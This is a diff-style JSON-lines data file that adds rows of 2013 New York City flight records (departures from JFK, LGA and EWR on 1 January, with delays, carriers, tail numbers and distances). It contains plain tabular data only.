+{"year":2013,"month":1,"day":1,"dep_time":923,"sched_dep_time":919,"dep_delay":4,"arr_time":1026,"sched_arr_time":1030,"arr_delay":-4,"carrier":"B6","flight":1004,"tailnum":"N580JB","origin":"JFK","dest":"BOS","air_time":38,"distance":187,"hour":9,"minute":19,"time_hour":"2013-01-01 09:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":926,"sched_dep_time":929,"dep_delay":-3,"arr_time":1404,"sched_arr_time":1421,"arr_delay":-17,"carrier":"B6","flight":215,"tailnum":"N775JB","origin":"EWR","dest":"SJU","air_time":191,"distance":1608,"hour":9,"minute":29,"time_hour":"2013-01-01 09:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":926,"sched_dep_time":922,"dep_delay":4,"arr_time":1221,"sched_arr_time":1219,"arr_delay":2,"carrier":"B6","flight":57,"tailnum":"N534JB","origin":"JFK","dest":"PBI","air_time":151,"distance":1028,"hour":9,"minute":22,"time_hour":"2013-01-01 09:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":926,"sched_dep_time":928,"dep_delay":-2,"arr_time":1233,"sched_arr_time":1220,"arr_delay":13,"carrier":"UA","flight":1597,"tailnum":"N27733","origin":"EWR","dest":"EGE","air_time":287,"distance":1726,"hour":9,"minute":28,"time_hour":"2013-01-01 09:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":927,"sched_dep_time":930,"dep_delay":-3,"arr_time":1231,"sched_arr_time":1257,"arr_delay":-26,"carrier":"DL","flight":1335,"tailnum":"N951DL","origin":"LGA","dest":"RSW","air_time":166,"distance":1080,"hour":9,"minute":30,"time_hour":"2013-01-01 09:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":929,"sched_dep_time":929,"dep_delay":0,"arr_time":1028,"sched_arr_time":1042,"arr_delay":-14,"carrier":"EV","flight":4636,"tailnum":"N11551","origin":"EWR","dest":"DCA","air_time":43,"distance":199,"hour":9,"minute":29,"time_hour":"2013-01-01 09:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":929,"sched_dep_time":925,"dep_delay":4,"arr_time":1220,"sched_arr_time":1150,"arr_delay":30,"carrier":"WN","flight":766,"tailnum":"N957WN","origin":"EWR","dest":"DEN","air_time":264,"distance":1605,"hour":9,"minute":25,"time_hour":"2013-01-01 09:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":930,"sched_dep_time":905,"dep_delay":25,"arr_time":1218,"sched_arr_time":1209,"arr_delay":9,"carrier":"UA","flight":1148,"tailnum":"N57439","origin":"EWR","dest":"TPA","air_time":149,"distance":997,"hour":9,"minute":5,"time_hour":"2013-01-01 09:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":931,"sched_dep_time":930,"dep_delay":1,"arr_time":1237,"sched_arr_time":1238,"arr_delay":-1,"carrier":"B6","flight":375,"tailnum":"N508JB","origin":"LGA","dest":"FLL","air_time":161,"distance":1076,"hour":9,"minute":30,"time_hour":"2013-01-01 09:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":931,"sched_dep_time":930,"dep_delay":1,"arr_time":1121,"sched_arr_time":1108,"arr_delay":13,"carrier":"UA","flight":255,"tailnum":"N479UA","origin":"LGA","dest":"ORD","air_time":154,"distance":733,"hour":9,"minute":30,"time_hour":"2013-01-01 09:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":932,"sched_dep_time":930,"dep_delay":2,"arr_time":1219,"sched_arr_time":1225,"arr_delay":-6,"carrier":"VX","flight":251,"tailnum":"N641VA","origin":"JFK","dest":"LAS","air_time":324,"distance":2248,"hour":9,"minute":30,"time_hour":"2013-01-01 09:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":933,"sched_dep_time":937,"dep_delay":-4,"arr_time":1057,"sched_arr_time":1102,"arr_delay":-5,"carrier":"B6","flight":4,"tailnum":"N503JB","origin":"JFK","dest":"BUF","air_time":66,"distance":301,"hour":9,"minute":37,"time_hour":"2013-01-01 09:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":933,"sched_dep_time":904,"dep_delay":29,"arr_time":1252,"sched_arr_time":1210,"arr_delay":42,"carrier":"B6","flight":17,"tailnum":"N579JB","origin":"JFK","dest":"FLL","air_time":170,"distance":1069,"hour":9,"minute":4,"time_hour":"2013-01-01 09:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":933,"sched_dep_time":935,"dep_delay":-2,"arr_time":1120,"sched_arr_time":1105,"arr_delay":15,"carrier":"WN","flight":3895,"tailnum":"N487WN","origin":"LGA","dest":"MDW","air_time":145,"distance":725,"hour":9,"minute":35,"time_hour":"2013-01-01 09:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":936,"sched_dep_time":940,"dep_delay":-4,"arr_time":1235,"sched_arr_time":1251,"arr_delay":-16,"carrier":"DL","flight":2137,"tailnum":"N975DL","origin":"LGA","dest":"TPA","air_time":159,"distance":1010,"hour":9,"minute":40,"time_hour":"2013-01-01 09:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":936,"sched_dep_time":945,"dep_delay":-9,"arr_time":1257,"sched_arr_time":1309,"arr_delay":-12,"carrier":"DL","flight":1903,"tailnum":"N900DE","origin":"LGA","dest":"SRQ","air_time":169,"distance":1047,"hour":9,"minute":45,"time_hour":"2013-01-01 09:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":937,"sched_dep_time":940,"dep_delay":-3,"arr_time":1238,"sched_arr_time":1235,"arr_delay":3,"carrier":"B6","flight":361,"tailnum":"N615JB","origin":"LGA","dest":"PBI","air_time":154,"distance":1035,"hour":9,"minute":40,"time_hour":"2013-01-01 09:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":937,"sched_dep_time":940,"dep_delay":-3,"arr_time":1127,"sched_arr_time":1120,"arr_delay":7,"carrier":"WN","flight":1807,"tailnum":"N729SW","origin":"LGA","dest":"MKE","air_time":143,"distance":738,"hour":9,"minute":40,"time_hour":"2013-01-01 09:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":940,"sched_dep_time":945,"dep_delay":-5,"arr_time":1119,"sched_arr_time":1130,"arr_delay":-11,"carrier":"AA","flight":319,"tailnum":"N4WJAA","origin":"LGA","dest":"ORD","air_time":133,"distance":733,"hour":9,"minute":45,"time_hour":"2013-01-01 09:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":940,"sched_dep_time":955,"dep_delay":-15,"arr_time":1226,"sched_arr_time":1220,"arr_delay":6,"carrier":"MQ","flight":4654,"tailnum":"N525MQ","origin":"LGA","dest":"ATL","air_time":129,"distance":762,"hour":9,"minute":55,"time_hour":"2013-01-01 09:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":941,"sched_dep_time":945,"dep_delay":-4,"arr_time":1300,"sched_arr_time":1258,"arr_delay":2,"carrier":"B6","flight":679,"tailnum":"N806JB","origin":"JFK","dest":"LAX","air_time":352,"distance":2475,"hour":9,"minute":45,"time_hour":"2013-01-01 09:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":946,"sched_dep_time":959,"dep_delay":-13,"arr_time":1146,"sched_arr_time":1202,"arr_delay":-16,"carrier":"EV","flight":4175,"tailnum":"N15912","origin":"EWR","dest":"AVL","air_time":105,"distance":583,"hour":9,"minute":59,"time_hour":"2013-01-01 09:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":947,"sched_dep_time":953,"dep_delay":-6,"arr_time":1053,"sched_arr_time":1110,"arr_delay":-17,"carrier":"B6","flight":600,"tailnum":"N306JB","origin":"JFK","dest":"PWM","air_time":47,"distance":273,"hour":9,"minute":53,"time_hour":"2013-01-01 09:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":950,"sched_dep_time":954,"dep_delay":-4,"arr_time":1155,"sched_arr_time":1142,"arr_delay":13,"carrier":"EV","flight":4681,"tailnum":"N12567","origin":"EWR","dest":"STL","air_time":170,"distance":872,"hour":9,"minute":54,"time_hour":"2013-01-01 09:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":953,"sched_dep_time":959,"dep_delay":-6,"arr_time":1141,"sched_arr_time":1129,"arr_delay":12,"carrier":"MQ","flight":4670,"tailnum":"N6EAMQ","origin":"LGA","dest":"BNA","air_time":144,"distance":764,"hour":9,"minute":59,"time_hour":"2013-01-01 09:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":953,"sched_dep_time":921,"dep_delay":32,"arr_time":1320,"sched_arr_time":1241,"arr_delay":39,"carrier":"UA","flight":222,"tailnum":"N586UA","origin":"EWR","dest":"LAX","air_time":346,"distance":2454,"hour":9,"minute":21,"time_hour":"2013-01-01 09:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":955,"sched_dep_time":1000,"dep_delay":-5,"arr_time":1336,"sched_arr_time":1325,"arr_delay":11,"carrier":"US","flight":75,"tailnum":"N642AW","origin":"EWR","dest":"PHX","air_time":324,"distance":2133,"hour":10,"minute":0,"time_hour":"2013-01-01 10:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":956,"sched_dep_time":1000,"dep_delay":-4,"arr_time":1241,"sched_arr_time":1241,"arr_delay":0,"carrier":"DL","flight":1847,"tailnum":"N956DL","origin":"LGA","dest":"ATL","air_time":129,"distance":762,"hour":10,"minute":0,"time_hour":"2013-01-01 10:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":957,"sched_dep_time":733,"dep_delay":144,"arr_time":1056,"sched_arr_time":853,"arr_delay":123,"carrier":"UA","flight":856,"tailnum":"N534UA","origin":"EWR","dest":"BOS","air_time":37,"distance":200,"hour":7,"minute":33,"time_hour":"2013-01-01 07:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":959,"sched_dep_time":1002,"dep_delay":-3,"arr_time":1313,"sched_arr_time":1319,"arr_delay":-6,"carrier":"DL","flight":2379,"tailnum":"N965DL","origin":"LGA","dest":"FLL","air_time":151,"distance":1076,"hour":10,"minute":2,"time_hour":"2013-01-01 10:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":959,"sched_dep_time":1000,"dep_delay":-1,"arr_time":1151,"sched_arr_time":1206,"arr_delay":-15,"carrier":"US","flight":1177,"tailnum":"N765US","origin":"LGA","dest":"CLT","air_time":90,"distance":544,"hour":10,"minute":0,"time_hour":"2013-01-01 10:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1003,"sched_dep_time":1010,"dep_delay":-7,"arr_time":1255,"sched_arr_time":1320,"arr_delay":-25,"carrier":"B6","flight":503,"tailnum":"N565JB","origin":"EWR","dest":"FLL","air_time":152,"distance":1065,"hour":10,"minute":10,"time_hour":"2013-01-01 10:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1003,"sched_dep_time":959,"dep_delay":4,"arr_time":1408,"sched_arr_time":1329,"arr_delay":39,"carrier":"US","flight":196,"tailnum":"N541UW","origin":"JFK","dest":"PHX","air_time":342,"distance":2153,"hour":9,"minute":59,"time_hour":"2013-01-01 09:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1005,"sched_dep_time":1000,"dep_delay":5,"arr_time":1239,"sched_arr_time":1234,"arr_delay":5,"carrier":"UA","flight":1625,"tailnum":"N81449","origin":"EWR","dest":"DEN","air_time":254,"distance":1605,"hour":10,"minute":0,"time_hour":"2013-01-01 10:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1007,"sched_dep_time":1010,"dep_delay":-3,"arr_time":1147,"sched_arr_time":1140,"arr_delay":7,"carrier":"MQ","flight":3795,"tailnum":"N503MQ","origin":"EWR","dest":"ORD","air_time":131,"distance":719,"hour":10,"minute":10,"time_hour":"2013-01-01 10:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1009,"sched_dep_time":1015,"dep_delay":-6,"arr_time":1219,"sched_arr_time":1229,"arr_delay":-10,"carrier":"DL","flight":2319,"tailnum":"N933DL","origin":"LGA","dest":"MSP","air_time":160,"distance":1020,"hour":10,"minute":15,"time_hour":"2013-01-01 10:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1010,"sched_dep_time":1015,"dep_delay":-5,"arr_time":1204,"sched_arr_time":1210,"arr_delay":-6,"carrier":"US","flight":1103,"tailnum":"N162UW","origin":"EWR","dest":"CLT","air_time":90,"distance":529,"hour":10,"minute":15,"time_hour":"2013-01-01 10:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1010,"sched_dep_time":1015,"dep_delay":-5,"arr_time":1225,"sched_arr_time":1214,"arr_delay":11,"carrier":"US","flight":1441,"tailnum":"N712US","origin":"JFK","dest":"CLT","air_time":97,"distance":541,"hour":10,"minute":15,"time_hour":"2013-01-01 10:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1011,"sched_dep_time":1001,"dep_delay":10,"arr_time":1133,"sched_arr_time":1128,"arr_delay":5,"carrier":"EV","flight":5736,"tailnum":"N820AS","origin":"LGA","dest":"IAD","air_time":59,"distance":229,"hour":10,"minute":1,"time_hour":"2013-01-01 10:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1011,"sched_dep_time":1015,"dep_delay":-4,"arr_time":1246,"sched_arr_time":1307,"arr_delay":-21,"carrier":"DL","flight":1529,"tailnum":"N399DA","origin":"JFK","dest":"LAS","air_time":320,"distance":2248,"hour":10,"minute":15,"time_hour":"2013-01-01 10:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1021,"sched_dep_time":1023,"dep_delay":-2,"arr_time":1254,"sched_arr_time":1252,"arr_delay":2,"carrier":"FL","flight":347,"tailnum":"N942AT","origin":"LGA","dest":"ATL","air_time":129,"distance":762,"hour":10,"minute":23,"time_hour":"2013-01-01 10:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1024,"sched_dep_time":1029,"dep_delay":-5,"arr_time":1140,"sched_arr_time":1150,"arr_delay":-10,"carrier":"EV","flight":4709,"tailnum":"N14905","origin":"EWR","dest":"BUF","air_time":59,"distance":282,"hour":10,"minute":29,"time_hour":"2013-01-01 10:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1024,"sched_dep_time":1030,"dep_delay":-6,"arr_time":1204,"sched_arr_time":1215,"arr_delay":-11,"carrier":"MQ","flight":4471,"tailnum":"N719MQ","origin":"LGA","dest":"RDU","air_time":78,"distance":431,"hour":10,"minute":30,"time_hour":"2013-01-01 10:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1025,"sched_dep_time":1020,"dep_delay":5,"arr_time":1356,"sched_arr_time":1330,"arr_delay":26,"carrier":"AA","flight":731,"tailnum":"N3FXAA","origin":"LGA","dest":"DFW","air_time":247,"distance":1389,"hour":10,"minute":20,"time_hour":"2013-01-01 10:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1025,"sched_dep_time":951,"dep_delay":34,"arr_time":1258,"sched_arr_time":1302,"arr_delay":-4,"carrier":"UA","flight":501,"tailnum":"N437UA","origin":"EWR","dest":"MCO","air_time":137,"distance":937,"hour":9,"minute":51,"time_hour":"2013-01-01 09:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1026,"sched_dep_time":1030,"dep_delay":-4,"arr_time":1351,"sched_arr_time":1340,"arr_delay":11,"carrier":"AA","flight":19,"tailnum":"N328AA","origin":"JFK","dest":"LAX","air_time":356,"distance":2475,"hour":10,"minute":30,"time_hour":"2013-01-01 10:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1028,"sched_dep_time":1026,"dep_delay":2,"arr_time":1350,"sched_arr_time":1339,"arr_delay":11,"carrier":"UA","flight":1004,"tailnum":"N76508","origin":"LGA","dest":"IAH","air_time":237,"distance":1416,"hour":10,"minute":26,"time_hour":"2013-01-01 10:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1029,"sched_dep_time":1030,"dep_delay":-1,"arr_time":1427,"sched_arr_time":1355,"arr_delay":32,"carrier":"AA","flight":179,"tailnum":"N325AA","origin":"JFK","dest":"SFO","air_time":389,"distance":2586,"hour":10,"minute":30,"time_hour":"2013-01-01 10:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1030,"sched_dep_time":1035,"dep_delay":-5,"arr_time":1229,"sched_arr_time":1246,"arr_delay":-17,"carrier":"EV","flight":4277,"tailnum":"N11189","origin":"EWR","dest":"CHS","air_time":100,"distance":628,"hour":10,"minute":35,"time_hour":"2013-01-01 10:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1031,"sched_dep_time":1030,"dep_delay":1,"arr_time":1353,"sched_arr_time":1415,"arr_delay":-22,"carrier":"VX","flight":23,"tailnum":"N625VA","origin":"JFK","dest":"SFO","air_time":363,"distance":2586,"hour":10,"minute":30,"time_hour":"2013-01-01 10:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1031,"sched_dep_time":1030,"dep_delay":1,"arr_time":1323,"sched_arr_time":1334,"arr_delay":-11,"carrier":"UA","flight":1294,"tailnum":"N77258","origin":"EWR","dest":"FLL","air_time":157,"distance":1065,"hour":10,"minute":30,"time_hour":"2013-01-01 10:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1032,"sched_dep_time":1035,"dep_delay":-3,"arr_time":1305,"sched_arr_time":1250,"arr_delay":15,"carrier":"EV","flight":4180,"tailnum":"N13955","origin":"EWR","dest":"IND","air_time":135,"distance":645,"hour":10,"minute":35,"time_hour":"2013-01-01 10:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1033,"sched_dep_time":1017,"dep_delay":16,"arr_time":1130,"sched_arr_time":1136,"arr_delay":-6,"carrier":"UA","flight":779,"tailnum":"N849UA","origin":"EWR","dest":"BOS","air_time":42,"distance":200,"hour":10,"minute":17,"time_hour":"2013-01-01 10:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1037,"sched_dep_time":1030,"dep_delay":7,"arr_time":1221,"sched_arr_time":1210,"arr_delay":11,"carrier":"AA","flight":321,"tailnum":"N581AA","origin":"LGA","dest":"ORD","air_time":133,"distance":733,"hour":10,"minute":30,"time_hour":"2013-01-01 10:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1038,"sched_dep_time":1030,"dep_delay":8,"arr_time":1223,"sched_arr_time":1202,"arr_delay":21,"carrier":"UA","flight":985,"tailnum":"N423UA","origin":"EWR","dest":"ORD","air_time":149,"distance":719,"hour":10,"minute":30,"time_hour":"2013-01-01 10:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1042,"sched_dep_time":1040,"dep_delay":2,"arr_time":1325,"sched_arr_time":1326,"arr_delay":-1,"carrier":"B6","flight":31,"tailnum":"N529JB","origin":"JFK","dest":"MCO","air_time":142,"distance":944,"hour":10,"minute":40,"time_hour":"2013-01-01 10:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1044,"sched_dep_time":1045,"dep_delay":-1,"arr_time":1231,"sched_arr_time":1212,"arr_delay":19,"carrier":"EV","flight":4322,"tailnum":"N15555","origin":"EWR","dest":"MKE","air_time":151,"distance":725,"hour":10,"minute":45,"time_hour":"2013-01-01 10:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1044,"sched_dep_time":1045,"dep_delay":-1,"arr_time":1352,"sched_arr_time":1351,"arr_delay":1,"carrier":"UA","flight":455,"tailnum":"N667UA","origin":"EWR","dest":"IAH","air_time":229,"distance":1400,"hour":10,"minute":45,"time_hour":"2013-01-01 10:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1044,"sched_dep_time":1041,"dep_delay":3,"arr_time":1339,"sched_arr_time":1350,"arr_delay":-11,"carrier":"UA","flight":1060,"tailnum":"N76503","origin":"EWR","dest":"RSW","air_time":157,"distance":1068,"hour":10,"minute":41,"time_hour":"2013-01-01 10:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1047,"sched_dep_time":1055,"dep_delay":-8,"arr_time":1359,"sched_arr_time":1405,"arr_delay":-6,"carrier":"AA","flight":739,"tailnum":"N3AVAA","origin":"LGA","dest":"DFW","air_time":230,"distance":1389,"hour":10,"minute":55,"time_hour":"2013-01-01 10:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1047,"sched_dep_time":1050,"dep_delay":-3,"arr_time":1401,"sched_arr_time":1410,"arr_delay":-9,"carrier":"DL","flight":1275,"tailnum":"N3748Y","origin":"JFK","dest":"SLC","air_time":295,"distance":1990,"hour":10,"minute":50,"time_hour":"2013-01-01 10:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1048,"sched_dep_time":1050,"dep_delay":-2,"arr_time":1302,"sched_arr_time":1250,"arr_delay":12,"carrier":"MQ","flight":4589,"tailnum":"N537MQ","origin":"LGA","dest":"DTW","air_time":112,"distance":502,"hour":10,"minute":50,"time_hour":"2013-01-01 10:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1053,"sched_dep_time":1050,"dep_delay":3,"arr_time":1402,"sched_arr_time":1358,"arr_delay":4,"carrier":"B6","flight":373,"tailnum":"N520JB","origin":"LGA","dest":"FLL","air_time":165,"distance":1076,"hour":10,"minute":50,"time_hour":"2013-01-01 10:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1054,"sched_dep_time":1059,"dep_delay":-5,"arr_time":1326,"sched_arr_time":1339,"arr_delay":-13,"carrier":"DL","flight":1647,"tailnum":"N920DE","origin":"LGA","dest":"ATL","air_time":129,"distance":762,"hour":10,"minute":59,"time_hour":"2013-01-01 10:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1056,"sched_dep_time":1059,"dep_delay":-3,"arr_time":1203,"sched_arr_time":1209,"arr_delay":-6,"carrier":"EV","flight":4479,"tailnum":"N11544","origin":"EWR","dest":"PWM","air_time":51,"distance":284,"hour":10,"minute":59,"time_hour":"2013-01-01 10:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1056,"sched_dep_time":1100,"dep_delay":-4,"arr_time":1407,"sched_arr_time":1413,"arr_delay":-6,"carrier":"DL","flight":2185,"tailnum":"N917DL","origin":"LGA","dest":"TPA","air_time":158,"distance":1010,"hour":11,"minute":0,"time_hour":"2013-01-01 11:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1058,"sched_dep_time":1100,"dep_delay":-2,"arr_time":1210,"sched_arr_time":1216,"arr_delay":-6,"carrier":"US","flight":2171,"tailnum":"N951UW","origin":"LGA","dest":"DCA","air_time":50,"distance":214,"hour":11,"minute":0,"time_hour":"2013-01-01 11:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1059,"sched_dep_time":1100,"dep_delay":-1,"arr_time":1201,"sched_arr_time":1215,"arr_delay":-14,"carrier":"WN","flight":321,"tailnum":"N505SW","origin":"LGA","dest":"BWI","air_time":43,"distance":185,"hour":11,"minute":0,"time_hour":"2013-01-01 11:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1059,"sched_dep_time":1100,"dep_delay":-1,"arr_time":1210,"sched_arr_time":1215,"arr_delay":-5,"carrier":"MQ","flight":3792,"tailnum":"N509MQ","origin":"JFK","dest":"DCA","air_time":50,"distance":213,"hour":11,"minute":0,"time_hour":"2013-01-01 11:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1059,"sched_dep_time":1053,"dep_delay":6,"arr_time":1342,"sched_arr_time":1351,"arr_delay":-9,"carrier":"UA","flight":369,"tailnum":"N451UA","origin":"EWR","dest":"LAS","air_time":325,"distance":2227,"hour":10,"minute":53,"time_hour":"2013-01-01 10:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1101,"sched_dep_time":1043,"dep_delay":18,"arr_time":1345,"sched_arr_time":1332,"arr_delay":13,"carrier":"B6","flight":545,"tailnum":"N630JB","origin":"EWR","dest":"PBI","air_time":145,"distance":1023,"hour":10,"minute":43,"time_hour":"2013-01-01 10:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1103,"sched_dep_time":1100,"dep_delay":3,"arr_time":1410,"sched_arr_time":1421,"arr_delay":-11,"carrier":"DL","flight":2071,"tailnum":"N339NW","origin":"LGA","dest":"MIA","air_time":155,"distance":1096,"hour":11,"minute":0,"time_hour":"2013-01-01 11:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1105,"sched_dep_time":1047,"dep_delay":18,"arr_time":1428,"sched_arr_time":1405,"arr_delay":23,"carrier":"UA","flight":688,"tailnum":"N521UA","origin":"EWR","dest":"SFO","air_time":356,"distance":2565,"hour":10,"minute":47,"time_hour":"2013-01-01 10:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1107,"sched_dep_time":1115,"dep_delay":-8,"arr_time":1305,"sched_arr_time":1310,"arr_delay":-5,"carrier":"MQ","flight":4485,"tailnum":"N730MQ","origin":"LGA","dest":"CMH","air_time":95,"distance":479,"hour":11,"minute":15,"time_hour":"2013-01-01 11:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1109,"sched_dep_time":1115,"dep_delay":-6,"arr_time":1402,"sched_arr_time":1425,"arr_delay":-23,"carrier":"AA","flight":2099,"tailnum":"N3GSAA","origin":"LGA","dest":"MIA","air_time":157,"distance":1096,"hour":11,"minute":15,"time_hour":"2013-01-01 11:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1111,"sched_dep_time":1115,"dep_delay":-4,"arr_time":1222,"sched_arr_time":1226,"arr_delay":-4,"carrier":"B6","flight":24,"tailnum":"N279JB","origin":"JFK","dest":"BTV","air_time":52,"distance":266,"hour":11,"minute":15,"time_hour":"2013-01-01 11:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1112,"sched_dep_time":1100,"dep_delay":12,"arr_time":1440,"sched_arr_time":1438,"arr_delay":2,"carrier":"UA","flight":285,"tailnum":"N517UA","origin":"JFK","dest":"SFO","air_time":364,"distance":2586,"hour":11,"minute":0,"time_hour":"2013-01-01 11:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1113,"sched_dep_time":1115,"dep_delay":-2,"arr_time":1318,"sched_arr_time":1315,"arr_delay":3,"carrier":"DL","flight":1031,"tailnum":"N320NB","origin":"LGA","dest":"DTW","air_time":104,"distance":502,"hour":11,"minute":15,"time_hour":"2013-01-01 11:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1114,"sched_dep_time":900,"dep_delay":134,"arr_time":1447,"sched_arr_time":1222,"arr_delay":145,"carrier":"UA","flight":1086,"tailnum":"N76502","origin":"LGA","dest":"IAH","air_time":248,"distance":1416,"hour":9,"minute":0,"time_hour":"2013-01-01 09:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1120,"sched_dep_time":944,"dep_delay":96,"arr_time":1331,"sched_arr_time":1213,"arr_delay":78,"carrier":"EV","flight":4495,"tailnum":"N16561","origin":"EWR","dest":"SAV","air_time":117,"distance":708,"hour":9,"minute":44,"time_hour":"2013-01-01 09:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1120,"sched_dep_time":1125,"dep_delay":-5,"arr_time":1330,"sched_arr_time":1325,"arr_delay":5,"carrier":"WN","flight":1057,"tailnum":"N469WN","origin":"LGA","dest":"STL","air_time":176,"distance":888,"hour":11,"minute":25,"time_hour":"2013-01-01 11:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1123,"sched_dep_time":1110,"dep_delay":13,"arr_time":1410,"sched_arr_time":1336,"arr_delay":34,"carrier":"UA","flight":405,"tailnum":"N587UA","origin":"LGA","dest":"DEN","air_time":256,"distance":1620,"hour":11,"minute":10,"time_hour":"2013-01-01 11:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1124,"sched_dep_time":1100,"dep_delay":24,"arr_time":1435,"sched_arr_time":1431,"arr_delay":4,"carrier":"B6","flight":641,"tailnum":"N590JB","origin":"JFK","dest":"SFO","air_time":349,"distance":2586,"hour":11,"minute":0,"time_hour":"2013-01-01 11:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1124,"sched_dep_time":1125,"dep_delay":-1,"arr_time":1445,"sched_arr_time":1445,"arr_delay":0,"carrier":"DL","flight":1171,"tailnum":"N376NW","origin":"LGA","dest":"RSW","air_time":169,"distance":1080,"hour":11,"minute":25,"time_hour":"2013-01-01 11:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1125,"sched_dep_time":1130,"dep_delay":-5,"arr_time":1325,"sched_arr_time":1332,"arr_delay":-7,"carrier":"US","flight":1085,"tailnum":"N169UW","origin":"LGA","dest":"CLT","air_time":94,"distance":544,"hour":11,"minute":30,"time_hour":"2013-01-01 11:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1127,"sched_dep_time":1129,"dep_delay":-2,"arr_time":1303,"sched_arr_time":1309,"arr_delay":-6,"carrier":"EV","flight":4294,"tailnum":"N14180","origin":"EWR","dest":"RDU","air_time":73,"distance":416,"hour":11,"minute":29,"time_hour":"2013-01-01 11:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1127,"sched_dep_time":1130,"dep_delay":-3,"arr_time":1504,"sched_arr_time":1448,"arr_delay":16,"carrier":"UA","flight":703,"tailnum":"N518UA","origin":"JFK","dest":"LAX","air_time":357,"distance":2475,"hour":11,"minute":30,"time_hour":"2013-01-01 11:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1127,"sched_dep_time":1129,"dep_delay":-2,"arr_time":1421,"sched_arr_time":1425,"arr_delay":-4,"carrier":"UA","flight":1143,"tailnum":"N14118","origin":"EWR","dest":"PBI","air_time":156,"distance":1023,"hour":11,"minute":29,"time_hour":"2013-01-01 11:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1128,"sched_dep_time":1129,"dep_delay":-1,"arr_time":1422,"sched_arr_time":1437,"arr_delay":-15,"carrier":"UA","flight":987,"tailnum":"N496UA","origin":"EWR","dest":"TPA","air_time":156,"distance":997,"hour":11,"minute":29,"time_hour":"2013-01-01 11:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1130,"sched_dep_time":1125,"dep_delay":5,"arr_time":1301,"sched_arr_time":1305,"arr_delay":-4,"carrier":"AA","flight":327,"tailnum":"N3DEAA","origin":"LGA","dest":"ORD","air_time":127,"distance":733,"hour":11,"minute":25,"time_hour":"2013-01-01 11:00:00"} 